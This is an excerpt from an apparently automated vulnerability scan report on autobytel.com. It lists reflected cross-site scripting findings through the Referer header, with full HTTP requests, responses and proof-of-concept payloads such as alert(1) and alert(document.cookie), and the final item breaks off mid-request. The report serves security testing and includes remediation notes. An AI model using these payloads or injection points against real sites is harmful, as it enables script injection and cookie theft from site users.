4.1927. http://www.autobytel.com/content/home/help/index.cfm/action/terms [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/terms

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 518a5--><img%20src%3da%20onerror%3dalert(1)>3344f3486f4 was submitted in the Referer HTTP header. This input was echoed as 518a5--><img src=a onerror=alert(1)>3344f3486f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /content/home/help/index.cfm/action/terms HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=518a5--><img%20src%3da%20onerror%3dalert(1)>3344f3486f4

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:41:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:41:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:41:15 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:41:15 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E518a5%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E3344f3486f4;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 54812


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: 518a5--><img src=a onerror=alert(1)>3344f3486f4 -->
...[SNIP]...

4.1928. http://www.autobytel.com/content/home/help/index.cfm/action/terms [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/terms

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57975"%3balert(1)//9e360c8f5f0 was submitted in the Referer HTTP header. This input was echoed as 57975";alert(1)//9e360c8f5f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/home/help/index.cfm/action/terms HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=57975"%3balert(1)//9e360c8f5f0

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:41:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:41:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:41:08 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:41:08 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E57975%22%3Balert%281%29%2F%2F9e360c8f5f0;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 54774


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~57975";alert(1)//9e360c8f5f0";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "48042108-D848-C946-3E10BA4C
...[SNIP]...

4.1929. http://www.autobytel.com/content/home/index.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/index.cfm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19094"%3balert(1)//ce2e6207b9e was submitted in the Referer HTTP header. This input was echoed as 19094";alert(1)//ce2e6207b9e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/home/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=19094"%3balert(1)//ce2e6207b9e

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 70798
Expires: Mon, 24 Jan 2011 23:47:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:47:46 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:47:45 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E19094%22%3Balert%281%29%2F%2Fce2e6207b9e;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~19094";alert(1)//ce2e6207b9e";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "4840A56E-F691-6D7A-D677BD4D
...[SNIP]...

4.1930. http://www.autobytel.com/content/home/index.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/index.cfm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload acf44--><img%20src%3da%20onerror%3dalert(1)>f2e0ef7d622 was submitted in the Referer HTTP header. This input was echoed as acf44--><img src=a onerror=alert(1)>f2e0ef7d622 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /content/home/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=acf44--><img%20src%3da%20onerror%3dalert(1)>f2e0ef7d622

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:48:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:48:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:48:05 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Eacf44%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3Ef2e0ef7d622;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 70827


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: acf44--><img src=a onerror=alert(1)>f2e0ef7d622 -->
...[SNIP]...

4.1931. http://www.autobytel.com/content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a81cb"%3balert(1)//4abd427f15d was submitted in the Referer HTTP header. This input was echoed as a81cb";alert(1)//4abd427f15d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/ HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=a81cb"%3balert(1)//4abd427f15d

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Tue, 25 Jan 2011 00:41:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:41:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Thu, 17-Jan-2041 00:41:10 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Thu, 17-Jan-2041 00:41:10 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Ea81cb%22%3Balert%281%29%2F%2F4abd427f15d;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 75157


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~a81cb";alert(1)//4abd427f15d";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "4A27937D-F1C2-17A3-3CDF78B9
...[SNIP]...

4.1932. http://www.autobytel.com/content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 9d81c--><img%20src%3da%20onerror%3dalert(1)>2c2ef4eb7df was submitted in the Referer HTTP header. This input was echoed as 9d81c--><img src=a onerror=alert(1)>2c2ef4eb7df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/ HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=9d81c--><img%20src%3da%20onerror%3dalert(1)>2c2ef4eb7df

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Tue, 25 Jan 2011 00:44:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:44:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Thu, 17-Jan-2041 00:44:16 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Thu, 17-Jan-2041 00:44:16 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E9d81c%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E2c2ef4eb7df;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 75195


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: 9d81c--><img src=a onerror=alert(1)>2c2ef4eb7df -->
...[SNIP]...

4.1933. http://www.autobytel.com/content/research/article/index.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/article/index.cfm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c06a"%3balert(1)//ecd19609a5d was submitted in the Referer HTTP header. This input was echoed as 8c06a";alert(1)//ecd19609a5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/research/article/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=8c06a"%3balert(1)//ecd19609a5d

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:38:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:38:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:38:47 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:38:47 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E8c06a%22%3Balert%281%29%2F%2Fecd19609a5d;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 42845


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~8c06a";alert(1)//ecd19609a5d";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47EE99F2-A594-77AD-EB2F0AA6
...[SNIP]...

4.1934. http://www.autobytel.com/content/research/article/index.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/article/index.cfm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 5f58d--><img%20src%3da%20onerror%3dalert(1)>4dfd8201d14 was submitted in the Referer HTTP header. This input was echoed as 5f58d--><img src=a onerror=alert(1)>4dfd8201d14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /content/research/article/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=5f58d--><img%20src%3da%20onerror%3dalert(1)>4dfd8201d14

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:38:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:38:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:38:57 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:38:57 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E5f58d%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E4dfd8201d14;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 42883


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: 5f58d--><img src=a onerror=alert(1)>4dfd8201d14 -->
...[SNIP]...

4.1935. http://www.autobytel.com/content/research/article/index.cfm/filters/Auto%20Show [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/article/index.cfm/filters/Auto%20Show

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43339"%3balert(1)//8f32a5fa65 was submitted in the Referer HTTP header. This input was echoed as 43339";alert(1)//8f32a5fa65 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/research/article/index.cfm/filters/Auto%20Show HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
